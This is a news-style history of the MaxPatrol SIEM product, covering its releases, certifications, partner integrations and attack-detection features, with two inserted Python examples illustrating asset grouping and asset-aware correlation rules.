MaxPatrol SIEM is now available for purchase in the republic. The certificate is valid until May 29, 2023.

During certification, the MaxPatrol SIEM product itself was tested and its production conditions were analyzed. In particular, the functioning of the quality management system for the development and production of MaxPatrol SIEM, the availability of production facilities and a testing laboratory, technological equipment and controls, and personnel qualifications were checked.

MaxPatrol SIEM Architecture

Product certification allows Belarusian companies to use MaxPatrol SIEM to build systems for protecting information whose distribution or provision is restricted, to build security systems for critical informatization objects, and to ensure the integrity and authenticity of electronic documents in state information systems.

"This is a necessary step to bring MaxPatrol SIEM to the Belarusian market. We see serious interest in the product among government agencies, banks and industrial enterprises, and we are confident that MaxPatrol SIEM will help them quickly identify attacks and thus raise their level of security," said Alexander Pankov, Director for Business Development in the Republic of Belarus.

Positive Technologies plans to gradually bring all of its expert services to the Belarusian market, from penetration tests and security audits to incident response and investigation, as well as the company's full product portfolio. As of June 21, 2018, three Positive Technologies products had been certified by the Operational and Analytical Center under the President of the Republic of Belarus: MaxPatrol 8, MaxPatrol SIEM and PT Application Firewall. In the republic, Positive Technologies is represented by its official distributor, Axoft.

Release 4.0

On April 26, 2018, Positive Technologies presented the next version of its real-time information security incident detection system, MaxPatrol SIEM 4.0. The updated product received a full-fledged mechanism for obtaining and updating information security expertise, expanded capabilities for enriching asset data, and attack detection in network traffic. According to the company, this ensures high accuracy and speed in detecting attacker actions on the corporate network and countering new types of threats.

A distinguishing feature of this version is the regular, automated delivery of incident detection expertise in the form of algorithms capable of detecting even complex, atypical attacks. The corresponding sets of rules and recommendations are produced by the Positive Technologies Expert Security Center (PT Expert Security Center) team, which continuously analyzes current threats, studies the full attack cycle and develops ways to detect and prevent attacks. Sets of rules and recommendations are combined into expertise packages and delivered to the Positive Technologies Knowledge Base (PT KB), which is part of MaxPatrol SIEM. The user can then select packages of interest in the PT KB interface and apply them within his installation of the product.

Updates delivered regularly to PT KB include ready-made correlation rules for incident detection, up-to-date normalization and aggregation rules, and recommendations for fine-tuning auditing on event sources so that attacks are identified accurately and detected incidents can be investigated.

The mechanism was tested on the previous version of the system when rules for detecting advanced cyberattacks on Microsoft Active Directory were added to it. For now, Positive Technologies plans to release expertise packages at least once every two months; by the end of 2018 the interval between them is expected to shrink to one month. In some cases rule sets are released outside the schedule, for example during global attacks on the scale of WannaCry or NotPetya.

MaxPatrol SIEM 4.0 improves the mechanisms for enriching asset data, the key elements of the IT infrastructure model in MaxPatrol SIEM. Among other things, knowledge about an asset is now automatically supplemented with data on the software and hardware of information resources, operating systems, installed updates and infrastructure configuration received from Microsoft System Center Configuration Manager (SCCM) and the MaxPatrol 8 security monitoring system.

Additionally, each asset is enriched with data from MaxPatrol SIEM's own network traffic analysis sensor. It discovers network nodes in traffic and passes open port information to MaxPatrol SIEM; new assets can be created from the data obtained. The expanded information about assets helps the information security service better understand the protected IT infrastructure and its vulnerabilities, calculate possible attack vectors more accurately, simplify incident investigation, identify the vulnerability that was exploited and prevent similar attacks.

The updated version also extends the built-in Network Sensor component, designed for comprehensive traffic analysis, including files transmitted over the network. Network Sensor received its own signature database for detecting exploitation of vulnerabilities and the operation of malicious software. Signatures are written on the basis of investigations conducted by the PT Expert Security Center team and analysis of threats and vulnerabilities relevant to organizations in various business sectors. As a result, a MaxPatrol SIEM 4.0 user can detect anomalies, malicious activity on the network and sources of suspicious traffic, and prevent attacks.

To manage information security at the strategic and tactical levels, a dedicated PT Security Intelligence Portal module is used. It is a tool for visualizing data and for in-depth analysis of information security processes, the work of the information security unit and the security tools in use. PT Security Intelligence Portal contains ready-made scorecards and performance metrics that allow management to assess how effective information security measures are and whether there are enough resources to achieve the goals. It helps information security and IT specialists predict possible incidents, prioritize tasks and conduct investigations, Positive Technologies noted.

Finally, the installation process was optimized in MaxPatrol SIEM 4.0: according to the developers, the likelihood of errors was minimized and the number of actions required to deploy the system was reduced by 60%.

Detecting advanced cyberattacks on Active Directory

Twenty-six incident detection rules for detecting advanced cyberattacks on Microsoft Active Directory were added to the MaxPatrol SIEM information security event management system, Positive Technologies reported on April 16, 2018. Their use makes it possible to identify attacks at the earliest stages, including the reconnaissance stage. Ultimately, the attacker's window of presence in the infrastructure can be reduced to several hours, the developers say.

The special rule package is the result of work by the Positive Technologies Expert Security Center: its experts analyzed the full cycle of attacks on Active Directory and identified the chain of information security events and network requests that indicate the presence of attackers in the infrastructure. A package of anomaly detection algorithms (correlation rules) was then developed to automatically analyze events for signs of such attacks and notify the information security unit through MaxPatrol SIEM. Information security specialists using the system can now identify attacks on Active Directory at the stages of reconnaissance, lateral movement within the network and remote command execution.

"As incident investigation experience shows, Microsoft Active Directory is the main target of attackers in any attack on corporate information systems. Compromising it gives unlimited control over the accounts and computers on the local network. Despite the strengthening of proactive security systems, attackers and professional pentesters keep finding new attack vectors on Active Directory that are difficult to detect in the IT infrastructure," said Maxim Filippov, director of business development in Russia at Positive Technologies. "Thanks to the technology we have implemented, expertise for identifying attacker actions in the infrastructure is delivered to the products in real time, including when attackers use the latest attack techniques and tools. MaxPatrol SIEM users will now be able to automatically detect advanced attacks on Microsoft Active Directory."

2017

PT Security Intelligence Portal Extension Module Release

On November 21, 2017, Positive Technologies announced the release of the PT Security Intelligence Portal extension module for MaxPatrol SIEM.

The tool is designed for the work of information security managers and visualization of their activities in a form adapted for top management. The module expands the capabilities of information security management at the strategic, tactical and operational levels.

Based on MaxPatrol SIEM data on assets, events and incidents, PT Security Intelligence Portal allows an information security management process to be built in line with the company's business goals. With it, one can analyze the existing information security processes and the work of the security tools and information security units in an organization of any scale, and present the results of the analysis to top management in an accessible and clear form.

The tool helps information security managers assess the security of the infrastructure and the sufficiency of protection measures. To get started immediately and obtain first results, PT Security Intelligence Portal includes a ready-made set of performance indicators and metrics for calculating them, assessing the effectiveness of systems, personnel and processes, which can be customized to the needs of the organization.

The MaxPatrol SIEM module is based on the knowledge accumulated while developing the analytical reporting portal for MaxPatrol 8 (PT Reporting Portal), the experience of the Expert Security Center (PT ESC), and the results of cooperation with key Positive Technologies clients.

PT Security Intelligence Portal is part of the company's comprehensive technology platform.

Integration with Solar Dozor

In October, Solar Security and Positive Technologies announced the completion of a project to integrate the Solar Dozor DLP solution with MaxPatrol SIEM, the system designed to identify information security incidents in real time. Solar Dozor now transfers data to MaxPatrol SIEM, so the security officer obtains from a single source a complete picture of information security events and incidents in the company, including data on the transfer of confidential information through various channels.

Compatibility with Dallas Lock 8.0 editions K and C

Positive Technologies and Confidential announced on August 17 that test results confirmed the correct joint operation of the MaxPatrol SIEM real-time incident detection system with the Dallas Lock 8.0 information protection tool, editions K and C (including the NSD, ESD, ME and SOV protection modules).

The integration of the two solutions was made possible by extending MaxPatrol SIEM with a new event source, the Dallas Lock 8.0 information security event database. This functionality became available to end customers in the latest product release.

Users can now use MaxPatrol SIEM to centrally collect and correlate information security events generated by the Dallas Lock 8.0 information protection tool and other security tools installed in the organization.

"Testing Dallas Lock solutions for compatibility with solutions from other security tool manufacturers is an important part of the work of the Information Protection Center. Thanks to the integration of the two solutions, end users have received an effective tool for centralized collection and analysis of security events," said Yegor Kozhemyaka, director of the Information Protection Center "Confidential."

"We are continuously improving the MaxPatrol SIEM product, including expanding the number of supported event sources from both foreign and Russian developers. Thanks to this, the end user of the system receives a complete picture of the security of the infrastructure at any time and can detect information security incidents occurring in it, regardless of the information protection tools in use," said Alexey Goldbergs, Head of Technology Partners at Positive Technologies.

Dallas Lock is certified by the FSTEC of Russia:

  • version 8.0-K: level 4 of control over the absence of undeclared capabilities (NDV), protection class 5 against unauthorized access (NSD), firewall (ME) class 3, EPS class 4, ESD class 4; certificate of conformity of the FSTEC of Russia No. 2720 dated 25.09.2012, valid until 25.09.2018
  • version 8.0-C: level 2 of control over the absence of undeclared capabilities (NDV), protection class 3 against unauthorized access (NSD), firewall (ME) class 3, EPS class 4, ESD class 2; certificate of conformity of the FSTEC of Russia No. 2945 dated 16.08.2013, valid until 16.08.2019

MaxPatrol SIEM is certified by the FSTEC of Russia for compliance with level 4 of NDV absence control and has a certificate of compliance with the FSTEC of Russia No. 3734 dated 12.04.2017, valid until 12.04.2020.

Updated MaxPatrol SIEM protects against WannaCry- and NotPetya-class threats

In July, Positive Technologies introduced the next version of MaxPatrol SIEM. The updated product's mechanisms quickly detect and localize epidemics such as WannaCry and NotPetya. Users can also create persistent, long-running correlation rules that detect even long-term APT attacks despite changes in the company's IT infrastructure.

"Over the past couple of months, hundreds of companies around the world have fallen victim to ransomware viruses: car factories, banks, retail chains, pharmaceutical and shipping companies. We try to respond quickly to such events, so the main changes in the new version of MaxPatrol SIEM are related to the detection and localization of cryptolocker epidemics. Technologies for checking network reachability and flexible work with assets and network interaction events will make it easier to identify any threats of this type. In addition, our experts quickly created the appropriate correlation rules for detecting WannaCry and NotPetya attacks," said Maxim Filippov, director of business development in Russia at Positive Technologies.

Recognizing Assets with New Parameters

The new algorithm for identifying hardware and software elements of the IT infrastructure (assets) takes dozens of asset parameters into account and gives each of them a different weight. As a result, MaxPatrol SIEM recognizes an asset even after its IP address, MAC address, hostname or other parameters change, which matters when DHCP is in use or hosts sit behind NAT. MaxPatrol SIEM thus builds a more accurate IT infrastructure model and allows more robust correlation rules to be created.

Localizing outbreak foci

The network reachability check implemented in the new version of MaxPatrol SIEM lets you quickly determine whether a node or network is reachable, down to the protocol and port. If a virus epidemic has started in a large, geographically distributed network and the ways it spreads are known (for example, specific ports), the administrator can quickly localize the outbreak and protect the data on tens of thousands of computers, or make sure that the epidemic does not threaten the enterprise's critical infrastructure.

According to the developers, MaxPatrol SIEM not only shows the current routes to a given asset on the network map but also highlights all available alternatives. This makes it possible to quickly detect network device configuration errors and prevent access policy violations. In addition, a few seconds are enough to check the network for nodes infected with WannaCry or NotPetya thanks to the new function of grouping network events by several attributes (for example, by senders and recipients of packets on port 445, excluding shared file servers).

Grouping assets by complex rules

MaxPatrol SIEM now allows dynamic asset groups to be formed by rules that combine AND, OR and NOT logic, and precise correlation rules to be configured on those groups to detect and respond to information security incidents. For example, a group of WannaCry-vulnerable assets can be created from three conditions: the presence of vulnerability CVE-2017-0145, open port 139 or 445, and the absence of antivirus on the node.
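The following added example (illustrative code written for this page, not MaxPatrol SIEM's group builder) shows how such a rule is expressed as a small boolean expression tree over asset attributes and re-evaluated against a constructed inventory: the WannaCry group from the text is `CVE-2017-0145 AND (139 OR 445) AND NOT antivirus`, and the same combinators produce any other group. The inventory, attribute names and the second rule are assumptions; the group is "dynamic" in the sense that membership is recomputed from the current inventory on every call, so a host drops out as soon as it is patched.

```python
"""Added example: dynamic asset groups as AND/OR/NOT predicate trees over an inventory.
Constructed inventory; attribute names are assumptions."""


def has_cve(cve):
    return lambda a: cve in a.get("vulns", ())


def port_open(port):
    return lambda a: port in a.get("open_ports", ())


def has_tag(tag):
    return lambda a: tag in a.get("tags", ())


def AND(*preds):
    return lambda a: all(p(a) for p in preds)


def OR(*preds):
    return lambda a: any(p(a) for p in preds)


def NOT(pred):
    return lambda a: not pred(a)


def build_group(assets, rule):
    """Evaluate `rule` over the current inventory; membership changes as attributes change."""
    return sorted(a["hostname"] for a in assets if rule(a))


def patch_asset(assets, hostname, cve):
    """Simulate remediation: return a copy of the inventory with `cve` removed from one host."""
    return [dict(a, vulns=[v for v in a.get("vulns", ()) if v != cve]) if a["hostname"] == hostname else a
            for a in assets]


# The group from the text: vulnerable AND SMB reachable AND NOT protected.
WANNACRY_EXPOSED = AND(has_cve("CVE-2017-0145"), OR(port_open(139), port_open(445)), NOT(has_tag("antivirus")))
# An assumed second group built from the same combinators: SMB exposed in the DMZ.
SMB_IN_DMZ = AND(OR(port_open(139), port_open(445)), has_tag("dmz"))

# Constructed inventory snapshot.
INVENTORY = [
    {"hostname": "WS01", "vulns": ["CVE-2017-0145"], "open_ports": [135, 445], "tags": []},
    {"hostname": "WS02", "vulns": ["CVE-2017-0145"], "open_ports": [445], "tags": ["antivirus"]},
    {"hostname": "FS01", "vulns": ["CVE-2017-0145"], "open_ports": [22], "tags": []},
    {"hostname": "WS03", "vulns": [], "open_ports": [139, 445], "tags": []},
    {"hostname": "LAPTOP5", "vulns": ["CVE-2017-0145"], "open_ports": [139], "tags": []},
    {"hostname": "WEB01", "vulns": [], "open_ports": [80, 445], "tags": ["dmz", "antivirus"]},
]

if __name__ == "__main__":
    print("WannaCry exposed:", build_group(INVENTORY, WANNACRY_EXPOSED))
    print("after patching WS01:", build_group(patch_asset(INVENTORY, "WS01", "CVE-2017-0145"), WANNACRY_EXPOSED))
    print("SMB in DMZ:", build_group(INVENTORY, SMB_IN_DMZ))
```

A correlation rule that only fires for sources or destinations inside `WANNACRY_EXPOSED` (port 445 traffic from a member to many new peers, say) is what turns the group into a targeted detection rather than a report.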

Detecting APT with time-stretched correlations

The updated MaxPatrol SIEM supports tabular lists, which expand the ability to deliver Positive Technologies expertise in the product. Information security incidents can now be identified on the basis of complex correlations spanning up to several years, which is especially important for detecting advanced persistent threats, where, according to the developer, the average "lifetime" of an attacker in an organization is 3 years.

Besides the new capabilities for identifying and analyzing incidents, the system received numerous interface improvements: new widgets with detailed information available on double-click, display of events on the IT infrastructure topology, and export of the network map in vector and raster formats.

Certificate of FSTEC of Russia

MaxPatrol SIEM, a system designed to manage information security incidents in real time, passed certification tests and received certificate of conformity of the FSTEC of Russia No. 3734 dated April 12, 2017. The certificate confirms that the system complies with the requirements and technical specifications of the FSTEC of Russia for level 4 of control over the absence of undeclared capabilities and can be used in automated systems containing confidential information up to and including class 1G, in personal data information systems up to security level 1, and in state information systems and industrial control systems up to class 1.

Spring 2017 update of MaxPatrol SIEM

On April 13, 2017, Positive Technologies announced the release of a new version of MaxPatrol SIEM. According to the company, this version increased the speed of asset discovery and network topology construction, and the rate of security event processing (normalization, aggregation, correlation) grew by 40%.

The updated system includes mechanisms for comprehensive analysis of network traffic and of file activity on workstations and servers, as well as a composite asset significance metric that automatically focuses control on critical workstations.


Comprehensive Network Traffic Analysis

With the new Network Sensor component, comprehensive analysis of network interaction became available at all layers of the OSI model, from the data link layer (L2) to the application layer (L7). The component identifies IT assets and builds the network topology more accurately and quickly, showing the current IT infrastructure model in real time. This information can be used in correlation rules to detect a wide range of attacks and violations of network access policies, such as use of the insecure Telnet protocol, transfer of large volumes of data from a client or server, downloads of malicious files, the presence of remote access applications (TeamViewer and the like), and incorrect segmentation of internal resources.


File Activity Monitoring

To obtain information about assets that cannot be detected by auditing the network infrastructure, the latest version implements the Endpoint Monitor component, an agent operating at the Windows driver level that monitors file activity in the segments holding company-critical information: file servers and workstations.

"MaxPatrol SIEM uses a number of mechanisms to build the most complete picture of the state of the IT infrastructure over time, which increases the durability of correlation rules and allows attacks to be detected quickly. This also applies to the Network Sensor and Endpoint Monitor components, thanks to which information about each asset is constantly enriched with fresh data on file changes, protocols and applications. This functionality allows more accurate correlation rules to be created and the maximum amount of infrastructure data to be collected at the start-up stage," said Alexey Andreev, Director of MaxPatrol SIEM Development at Positive Technologies.


Increased focus on key assets

The latest version of MaxPatrol SIEM introduces a composite (single) asset significance metric that allows incidents to be prioritized according to the importance of the asset and, as a result, reduces incident response time.


Automated reporting

MaxPatrol SIEM supports automatic generation of scheduled reports in common formats (PDF, DOCX, HTML, XLS, CSV, JSON, XML). This gives managers and specialists who have no access to the SIEM, but need operational information from it, a way to obtain that information. A generated report can be sent automatically to administrators by e-mail on the specified schedule.

This version of MaxPatrol SIEM adds custom widgets, system administrator activity logs, system component monitoring templates, and a number of other add-ons.

2016

Integration with InfoWatch Traffic Monitor Enterprise

On December 8, 2016, Positive Technologies and InfoWatch announced the completion of the integration of InfoWatch Traffic Monitor Enterprise 6.1 technology and MaxPatrol SIEM system.

Partners announced the start of the MaxPatrol SIEM support program for subsequent versions of InfoWatch Traffic Monitor.

As a result of integration, data coming from the InfoWatch Traffic Monitor DLP system became available for processing and analysis in MaxPatrol SIEM. SIEM users have the ability to track the history of the transfer of confidential information through corporate email and various web resources, messaging systems and file sharing tools, and block unauthorized actions of employees.

"The methods of action of attackers are improving every day, so manufacturers of security tools are forced to constantly expand the functionality of their systems in response to modern threats. The problem of information leakage is no exception. Often, a combination of SIEM-class and DLP-class solutions is used to quickly identify such incidents. Today MaxPatrol SIEM supports the means of protection of most domestic manufacturers, including InfoWatch. We continue to work on adapting MaxPatrol SIEM to work with InfoWatch Traffic Monitor. In particular, we aim to expand the list of supported versions of the DLP system, collect new types of events, simplify this process for the end user and automate it as much as possible," said Alexey Goldbergs, Head of Technology Partners at Positive Technologies.

"The main task of integrating InfoWatch Traffic Monitor and MaxPatrol SIEM is to protect the business processes of organizations from illegal actions of attackers at an early stage of their planning. Integration allows the company's information security service not only to quickly identify distributed attacks by correlating information from a DLP solution with other security tools, but also to block targeted attacks aimed at stealing confidential information. Minimizing financial, operational and reputational losses of customers is the main driver of the partnership between InfoWatch and Positive Technologies," said Marina Batalova, Product Development Manager at InfoWatch Group of Companies.

MaxPatrol SIEM Limited Edition

On September 20, 2016, Positive Technologies introduced MaxPatrol SIEM Limited Edition (LE), a fully functional software and hardware complex for real-time detection of information security incidents.

The product is intended for small and medium-scale IT infrastructures.

The product includes a hardware platform designed for storage of data for 15 months. For large amounts of data and long-term storage (up to 5 years), the storage capacity can be increased through the hardware archive storage option.

"The new product is the fastest and most affordable way to implement an enterprise SIEM system. With the support of Positive Technologies and technical innovations in the product, migration from other solutions to MaxPatrol SIEM LE is fast and painless for business processes," said Vladimir Bengin, Head of SIEM Sales Support at Positive Technologies.

MaxPatrol SIEM LE can be used as a separate complex or to scale the existing MaxPatrol SIEM system - it can be installed in territorial divisions and operate as part of a single system.

"In recent years, there has been a very alarming trend associated with the growing attention of hackers to small and medium-sized companies. On average, three in five cyber attacks target small business infrastructures. This is confirmed by Positive Technologies analysts and other security experts. Attackers are attracted by the relatively low level of security of such enterprises. In Russia, this trend is clearly visible in the financial sector, where instead of mass attacks on users, attackers are increasingly using complex targeted attacks against medium-sized credit institutions," said Maxim Filippov, Business Development Director of Positive Technologies in Russia.

The product has all the capabilities of the full version of MaxPatrol SIEM and is limited only in scalability. The demands on the SIEM operations team are reduced by automating administration procedures, building a complete model of the infrastructure and network topology, and using the integrated MaxPatrol platform instead of many heterogeneous information security solutions. MaxPatrol SIEM operates not only with individual IP addresses or hostnames, but also with higher-level categories: assets and dynamic asset groups. As a result, the rules remain functional even after infrastructure changes, which is a key difference from other SIEM systems.

MaxPatrol SIEM LE has no artificial performance limits; its performance is determined entirely by the characteristics of the hardware.

The product will help ensure compliance with current industry regulatory requirements. In particular, for the financial sector these are the federal law "On the National Payment System" 161-FZ (Bank of Russia Regulation No. 382-P), the Bank of Russia standard STO BR IBBS 2.5 (clause 6.5.2), and the federal law 152-FZ "On Personal Data." The product is included in the register of domestic software.

MaxPatrol 8.0 is certified for use in the Republic of Belarus

The Operational and Analytical Center under the President of the Republic of Belarus confirmed the compliance of the system with the requirements of technical regulations TR 2013/027/BY (STB 34.101.1-2014, STB 34.101.2-2014 and STB 34.101.3-2014). The certificate of conformity was issued by Axoftbel LLC and is valid until June 12, 2020 inclusive.

The obtained certificate allows you to use MaxPatrol 8.0 at informatization facilities of class A2, B2, V2, A3, B3 and V3, that is, to protect information systems that process or contain open information, data, the distribution and/or provision of which is limited, as well as information protected in accordance with the legislation of the Republic of Belarus.

MaxPatrol SIEM sales in 2015 amounted to 180 million rubles

The volume of sales of MaxPatrol SIEM at the end of the year amounted to about 180 million rubles, in 2016 the company plans to increase it to 400 million, and in 2017 to bring the product to the European market.

"The product is progressing rapidly," said Maxim Filippov, director of business development at Positive Technologies in Russia. "We learned how to carry out pilot projects with high quality, established the process of supporting any sources of the customer (no one has this), formed a world-class development system and understandable plans for the development of the product. 113 specialists of partner companies were trained. Our goal is to match the leaders of the Russian market for classic SIEM systems in 2017. We predict the growth of the Russian market in this segment from 2.2 billion rubles in 2016 to 3.2 billion in 2018, and set ourselves the task of taking a leading position in this market."

The creation of a product of this level required Positive Technologies specialists to abandon the waterfall (cascade) development model and move to more flexible practices, which made it possible to increase the speed and efficiency of releasing product updates, meeting market requirements and in some cases anticipating them.

"A product of this level required a transformation of the development process. For us, it was not only an external, but also an internal challenge. If earlier all our products were created by a group of enthusiasts who were partly hackers, partly developers, then when faced with a SIEM-level product, we realized that development should be singled out as a separate direction. Today, MaxPatrol SIEM is created by 80 developers and quality engineers. We switched to organizing micro-teams based on the Two Pizza Team model, which has proven its effectiveness in world-class companies. Such teams easily interact with each other, quickly make decisions and implement changes, radically improving the product from the user interface to the backend logic," comments Alexey Andreev, Director of MaxPatrol SIEM Development.

Positive Technologies' approach implies the creation of a platform whose key element is MaxPatrol SIEM. Built on an asset-centric approach, this platform must be manageable, adaptable to the dynamically changing infrastructure of the organization and solve its real problems. In accordance with the company's unique vision for the development of the SIEM industry and the new era of Threat Intelligence solutions, product development plans for the next three years have been formed, including four key releases annually. Thus, a release is planned for the third quarter of 2016 that will add a cloud mechanism for updating vulnerability data, and by autumn it is planned to introduce an auto-correlation mechanism based on modeling attack vectors. The quick release of updates allows corrections and improvements to be made promptly based on the results of pilot implementations.

In the spring of 2016, 26 were completed and another 25 MaxPatrol SIEM "pilots" are in operation, 15 commercial projects have been implemented. MaxPatrol SIEM is used by the Russian Ministry of Defense and the Ministry of Transport, the energy company Rosseti, the Moscow Department of Information Technology, the Committee for Informatization and Communications of St. Petersburg.

To the register of Russian programs

In early June 2016, by order of the Ministry of Telecom and Mass Communications of the Russian Federation, the MaxPatrol SIEM information security event monitoring system and the PT Application Firewall application-level firewall were entered in the unified register of Russian programs for electronic computers and databases. In accordance with the decision of the authorized body, since June 14, 2016 the PT Application Firewall system has been included in the software class comprising enterprise information security tools. MaxPatrol SIEM is also included in the class of monitoring and management systems and in the class of systems for collecting, storing, processing, analyzing, modeling and visualizing data arrays.

Since May 2016, the unified register of domestic software also includes the XSpider vulnerability scanner (in the class of information security tools) and the flagship solution of Positive Technologies - MaxPatrol 8.0 (in the class of enterprise information security monitoring and management systems).

MaxPatrol SIEM connected to InfoWatch Traffic Monitor Enterprise

In early summer 2016, Positive Technologies announced the connection of InfoWatch Traffic Monitor Enterprise version 4.1 as a source of information security events for the MaxPatrol SIEM system.

Positive Technologies experts deployed a test bench of the data leakage control system with the reproduction of typical information security events and developed rules for converting data received from the DLP system into the MaxPatrol SIEM format. As a result of the integration, SIEM users can track events from the DLP system in a single dashboard, including the transfer of confidential information through corporate mail, Internet resources, file sharing and messaging systems.

MaxPatrol SIEM also supports the means of protection of most domestic manufacturers: Dr.Web, Kaspersky Lab, Security Code, S-Terra CSP, Smart Line Ink, InfoWatch, InfoTeCS, etc.

MaxPatrol SIEM 2.0 is compatible with the means of protection of Russian manufacturers

On April 29, 2016, Positive Technologies announced the release of the MaxPatrol SIEM 2.0 version of the information security event collection and analysis system.

The version is distinguished by a simplified approach to the formation of correlation rules and expanded capabilities for incident investigation based on retrospective monitoring of the state of all IT infrastructure assets. As a result, the number of false positives of the system when working with large amounts of data decreases. Also in MaxPatrol SIEM 2.0, the knowledge base on supported data sources (including domestic ones) was expanded.

MaxPatrol SIEM 2.0 operates not only with information security events, but also with real infrastructure entities at any time - it accumulates information about the network, its nodes and configurations (including virtual machines), allowing you to build a complete model of the IT infrastructure and see the whole picture of what is happening.

The system allows you to use information about assets in correlation rules (from the list of installed software, access rights to the list of vulnerabilities) and assess the degree of risk of each incident. Thanks to this, the frequency of false positives of the system is significantly reduced, and information security specialists receive a tool for prompt investigation of security incidents with reference to specific observation objects.
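The following Python example, added here and not part of MaxPatrol SIEM's rule language or code, illustrates two points made in this section: that correlation rules can reference assets and dynamic asset groups instead of IP addresses and so keep working after infrastructure changes (as stated for MaxPatrol SIEM LE above), and that asset attributes such as installed software, together with the single asset significance metric, can drive correlation and incident prioritization. The asset model, the rule structure, the significance scale and the events are all constructed for the example.

```python
"""Asset-aware correlation and incident prioritization.

Added illustration: not MaxPatrol SIEM's rule language or code. The asset
model, rule structure, significance scale and events are constructed.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Asset:
    name: str
    ip: str                                  # current address in the infrastructure model
    role: str                                # e.g. "domain-controller", "workstation"
    significance: int                        # single asset metric, 1 (low) .. 5 (critical)
    software: List[str] = field(default_factory=list)


@dataclass(frozen=True)
class Event:
    ts: int                                  # seconds
    src_ip: str
    dst_ip: str
    kind: str                                # e.g. "auth-failure"


@dataclass(frozen=True)
class Rule:
    name: str
    kind: str                                # event kind the rule counts
    group: Callable[[Asset], bool]           # dynamic asset group expressed as a predicate
    threshold: int                           # events from one source against one asset
    window: int                              # sliding window, seconds
    severity: int                            # 1 .. 5


class AssetModel:
    """Resolves addresses to assets using the current state of the model."""

    def __init__(self, assets: List[Asset]) -> None:
        self.assets: Dict[str, Asset] = {a.name: a for a in assets}

    def by_ip(self, ip: str) -> Optional[Asset]:
        return next((a for a in self.assets.values() if a.ip == ip), None)

    def update_ip(self, name: str, new_ip: str) -> None:
        self.assets[name].ip = new_ip         # infrastructure change; rules stay untouched


def correlate(model: AssetModel, rule: Rule, events: List[Event]) -> List[dict]:
    """Count matching events per (source, asset) inside a sliding window and emit an
    incident at the threshold. Priority = rule severity x asset significance."""
    incidents: List[dict] = []
    per_key: Dict[Tuple[str, str], List[int]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind != rule.kind:
            continue
        asset = model.by_ip(ev.dst_ip)
        if asset is None or not rule.group(asset):
            continue                          # target is not in the rule's asset group
        times = per_key.setdefault((ev.src_ip, asset.name), [])
        times.append(ev.ts)
        while times and times[0] < ev.ts - rule.window:
            times.pop(0)                      # forget events that fell out of the window
        if len(times) >= rule.threshold:
            incidents.append({"rule": rule.name, "src": ev.src_ip, "asset": asset.name,
                              "priority": rule.severity * asset.significance})
            times.clear()                     # one incident per burst
    return incidents


def make_assets() -> List[Asset]:
    """Constructed asset inventory."""
    return [Asset("DC01", "10.0.0.10", "domain-controller", 5, ["windows-server"]),
            Asset("WS07", "10.0.1.7", "workstation", 1, ["windows-10", "legacy-agent"])]


# Rules reference groups (role, installed software), never addresses.
BRUTE_FORCE_DC = Rule("Brute force against domain controllers", "auth-failure",
                      lambda a: a.role == "domain-controller", threshold=3, window=60, severity=3)
LEGACY_AGENT_LOGON = Rule("Failed logons to hosts running legacy-agent", "auth-failure",
                          lambda a: "legacy-agent" in a.software, threshold=3, window=60, severity=2)


def failures(dst_ip: str, start: int) -> List[Event]:
    """Three constructed authentication failures from one source within 20 seconds."""
    return [Event(start + 10 * i, "10.0.9.9", dst_ip, "auth-failure") for i in range(3)]


def demo() -> Dict[str, List[dict]]:
    model = AssetModel(make_assets())
    before = correlate(model, BRUTE_FORCE_DC, failures("10.0.0.10", 0))
    model.update_ip("DC01", "10.0.0.20")      # DC01 is re-addressed
    after = correlate(model, BRUTE_FORCE_DC, failures("10.0.0.20", 100))   # still fires
    stale = correlate(model, BRUTE_FORCE_DC, failures("10.0.0.10", 200))   # old IP: no asset
    by_software = correlate(model, LEGACY_AGENT_LOGON, failures("10.0.1.7", 300))
    return {"before": before, "after": after, "stale": stale, "by_software": by_software}


if __name__ == "__main__":
    for label, found in demo().items():
        print(label, found)
```

The point of resolving every event to an asset first is that the rule text never has to change when the address plan does; the resolution step also makes the asset's significance available at the moment the incident is created, so the priority is assigned once and consistently.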

The updated system interface provides flexible work with data (including sorting, grouping, filtering, search mechanisms, redesigned in accordance with the urgent needs of an information security specialist) and allows you to generate reports of various complexity that reflect the real state of information security (including out of the box).

In this release, it is possible to create correlation rules, according to which disparate events are combined into incidents, directly from the web interface. As a result, the process of manually creating rules in some cases was reduced to several minutes.

The product has a knowledge base about supported sources (it is compatible with the equipment of leading foreign vendors and allows the security tools of most domestic manufacturers to be connected as event sources: Dr.Web, Kaspersky Business Space Security, S-Terra CSP, InfoWatch, Secret Net, InfoTeCS) and has more than 100 predefined correlation rules.

MaxPatrol SIEM 2.0 is an enterprise-level solution that meets all requirements for stability and performance in high-load enterprise systems.

Technical innovations and the fully open MaxPatrol SIEM 2.0 API allow it to be implemented, or migrated to from other SIEM solutions, almost imperceptibly for the business processes of the organization.

MaxPatrol and DeviceLock

On April 12, 2016, Positive Technologies and Smart Line Ink announced the implementation of a combination of the technological capabilities of MaxPatrol and DeviceLock products to protect corporate resources.

As a result of the partners' joint work, MaxPatrol SIEM can now automatically connect DeviceLock DLP Suite as a source of information security events.

"The number of supported sources is one of the key characteristics of a SIEM system. But what matters to the customer is not this figure itself, but confidence that the event sources in his IT infrastructure will be supported. And for the Russian customer, support for domestically produced information protection tools is a priority. Responding to these challenges, MaxPatrol SIEM already supports dozens of systems from domestic manufacturers, and we continue to expand their list. The threat of confidential data leakage is always relevant, and many companies, including MaxPatrol SIEM users, are actively using DLP systems. Therefore, we began adapting MaxPatrol SIEM to the nuances of DLP systems, the first of which was DeviceLock DLP Suite, the Russian software package for detecting and preventing leaks of confidential and critical data, widely used in government agencies and in financial, energy and telecommunications companies," said Maxim Filippov, Director of Positive Technologies for Business Development in Russia.

The revision of MaxPatrol SIEM was carried out jointly with Smart Line Ink. Positive Technologies experts deployed a test bench of the data leakage control system, reproduced external media connection events, and decoded and described the events in logs from the DLP system database.

Smart Line specialists gave the necessary explanations about the types and format of events generated by the DLP system and provided the ability to connect to its database. Based on the results of the work, rules were developed for converting data received from the DLP system into the MaxPatrol SIEM format. As a result of the improvement, the information security event monitoring and correlation system collects information from the DeviceLock DLP Suite database, including events of connecting flash drives, smartphones and other devices to work computers.
